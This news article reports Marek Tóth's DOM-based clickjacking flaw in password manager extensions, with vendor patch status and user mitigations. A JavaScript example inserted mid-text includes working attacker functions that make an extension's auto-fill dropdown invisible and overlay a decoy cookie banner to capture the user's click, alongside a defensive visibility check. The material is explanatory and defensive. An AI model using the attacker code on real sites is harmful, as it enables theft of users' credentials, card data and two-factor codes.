A newly disclosed flaw in password manager browser extensions could let attackers steal login credentials, credit card data, and two-factor codes from millions of users with a single click.
Independent researcher Marek Tóth has uncovered a vulnerability in popular password manager browser extensions that makes them susceptible to a type of clickjacking attack. The flaw, dubbed DOM-based extension clickjacking, was presented earlier this month at DEF CON 33. The vulnerability allows an attacker-controlled website to trick users into unintentionally triggering an auto-fill event, which could expose stored information including usernames, passwords, 2FA codes, and even credit card numbers.
Clickjacking, or UI redressing, is a well-known technique in which attackers manipulate a website’s interface so that users click on hidden elements. In this case, the target is the auto-fill user interface that password manager extensions inject into the page’s Document Object Model (DOM). Because that UI lives in the page’s DOM, the attacker’s page can style it: a malicious script sets the injected dropdown’s opacity to zero so it stays clickable but invisible, then overlays a fake pop-up, cookie banner, or CAPTCHA in the same spot so that the user’s click lands on the hidden auto-fill entry instead.
Tóth’s research tested 11 popular password manager extensions, including 1Password, iCloud Passwords, Bitwarden, Enpass, LastPass, and LogMeOnce. All were found vulnerable to some degree, with most allowing the theft of credentials and time-based one-time passwords (TOTPs). In some scenarios, passkey authentication was also exposed.
Six vendors have yet to fully patch the flaws, although Bitwarden has released version 2025.8.0 to address the issue. Apple’s iCloud Passwords and Enpass are actively working on fixes, while 1Password and LastPass classified the findings as “informative.”
“A single click anywhere on an attacker-controlled website could allow attackers to steal users’ data,” Tóth said, warning that the technique could be adapted to other extensions beyond password managers.
Software security firm Socket, which reviewed the research, confirmed its severity and said it has contacted US-CERT to have CVE identifiers assigned.
Until fixes are issued, Tóth recommends disabling auto-fill and restricting each extension’s site access to “on click,” so that the extension only injects its UI into a page after the user deliberately invokes it.
According to Malwarebytes Labs, the attack goes far beyond stealing login details. It “can also pilfer other information stored in password managers, including credit card information, personal data like your name and phone number, passkeys… and time-based one-time passwords (TOTP).” This makes the threat especially dangerous, as it targets multiple layers of authentication and sensitive personal data.
DOM-based extension clickjacking is a technique in which an attacker’s page manipulates the elements a browser extension injects into the page, making them invisible and luring users into clicking them so that stored information is filled in and leaked without the user noticing.
Traditional clickjacking hides or disguises a webpage’s own buttons and links; DOM-based extension clickjacking instead targets elements that a browser extension injects into the page, such as auto-fill prompts, which the page can style precisely because they live in its DOM.
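The mechanism described above and in the earlier explanation of the attack, as an added example that is not code from the article, the researcher or any password manager vendor: the attacker side hides an injected dropdown with opacity:0 and covers the spot with a decoy, and the defender side runs a visibility check before honouring a click on its own auto-fill UI. The selector, the decoy text, the ids and the opacity threshold are hypothetical placeholders; real extensions use their own markup and the vendors’ actual patches may differ.

```javascript
// Added example, not code from the article, the researcher or any password
// manager vendor. It models the attack the text describes (hide the
// extension's injected dropdown with opacity:0 and lure the click with a
// decoy) and a visibility check an extension could run before honouring a
// click on its own auto-fill UI. Selectors, ids and thresholds are
// hypothetical placeholders.

// ---------- attacker side: runs in the malicious page ----------
// Make the extension's injected dropdown invisible but still clickable, and
// keep doing so for nodes injected later. `selector` is a hypothetical match
// for the extension's element; real extensions use their own markup.
function hideExtensionUi(selector, doc = globalThis.document) {
  const neutralise = (node) => {
    if (node.nodeType === 1 && node.matches(selector)) {
      node.style.setProperty('opacity', '0', 'important');
      node.style.setProperty('pointer-events', 'auto', 'important');
    }
  };
  doc.querySelectorAll(selector).forEach(neutralise);
  const observer = new MutationObserver((records) => {
    for (const r of records) r.addedNodes.forEach(neutralise);
  });
  observer.observe(doc.documentElement, { childList: true, subtree: true });
  return observer;
}

// Draw a fake cookie banner over the spot where the dropdown appears.
// pointer-events:none lets the click fall through to the hidden dropdown
// underneath, so the user "accepts cookies" and actually selects a credential.
function placeDecoy(rect, doc = globalThis.document) {
  const decoy = doc.createElement('div');
  decoy.textContent = 'We use cookies. Accept';
  Object.assign(decoy.style, {
    position: 'fixed', left: `${rect.left}px`, top: `${rect.top}px`,
    width: `${rect.width}px`, height: `${rect.height}px`,
    background: '#fff', border: '1px solid #888', zIndex: '2147483647',
    pointerEvents: 'none',
  });
  doc.body.appendChild(decoy);
  return decoy;
}

// ---------- defender side: logic the extension could run on click ----------
// CSS opacity composes multiplicatively up the ancestor chain, so opacity:1
// inside a wrapper with opacity:0 is still invisible.
function effectiveOpacity(opacities) {
  return opacities.reduce((acc, o) => acc * o, 1);
}

// Decide whether a click on the auto-fill element should be honoured.
// `snapshot` is a plain object so the decision is testable without a DOM:
//   opacities: computed opacity of the element, then each ancestor up to root
//   visibility, display: computed values of the element itself
//   topIsOwn: whether the topmost hit-testable element at the click point
//             belongs to the extension's UI
function isClickTrustworthy(snapshot, minOpacity = 0.9) {
  const reasons = [];
  if (effectiveOpacity(snapshot.opacities) < minOpacity) reasons.push('transparent');
  if (snapshot.visibility !== 'visible' || snapshot.display === 'none') reasons.push('not-visible');
  if (!snapshot.topIsOwn) reasons.push('covered');
  return { ok: reasons.length === 0, reasons };
}

// Build the snapshot from a live element and the click coordinates.
function snapshotFor(el, x, y, win = globalThis.window) {
  const opacities = [];
  for (let n = el; n && n.nodeType === 1; n = n.parentElement) {
    opacities.push(parseFloat(win.getComputedStyle(n).opacity));
  }
  const cs = win.getComputedStyle(el);
  const top = win.document.elementsFromPoint(x, y)[0];
  return {
    opacities,
    visibility: cs.visibility,
    display: cs.display,
    topIsOwn: Boolean(top) && el.contains(top),
  };
}

// Attach the check as a capturing listener so it runs before the handler
// that performs the fill.
function guardAutofillClicks(el, win = globalThis.window) {
  el.addEventListener('click', (ev) => {
    const verdict = isClickTrustworthy(snapshotFor(el, ev.clientX, ev.clientY, win));
    if (!verdict.ok) {
      ev.stopImmediatePropagation();
      ev.preventDefault();
      console.warn('auto-fill click rejected:', verdict.reasons.join(', '));
    }
  }, true);
}
```

The opacity check catches the exact trick the article describes; the hit-test check catches an opaque overlay that sits above the dropdown and would otherwise intercept the click. Both are needed, because a decoy with pointer-events:none never appears in elementsFromPoint, and an ancestor with opacity:0 hides a child whose own computed opacity is 1. This is a heuristic an extension can run in its content script, not a complete fix: the page still controls the DOM the UI lives in, which is why the researcher’s interim advice is to stop the extension from injecting anything until the user invokes it.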
The study looked at 11 extensions including 1Password, iCloud Passwords, Bitwarden, Enpass, LastPass, and LogMeOnce. All showed vulnerabilities.
To protect themselves, users are advised to disable auto-fill, copy and paste credentials instead, and configure the extension’s site access to run “on click” rather than automatically on every page.
The technique is not limited to password managers. The researcher emphasized that it could be generalized to exploit other extensions that inject elements into the DOM.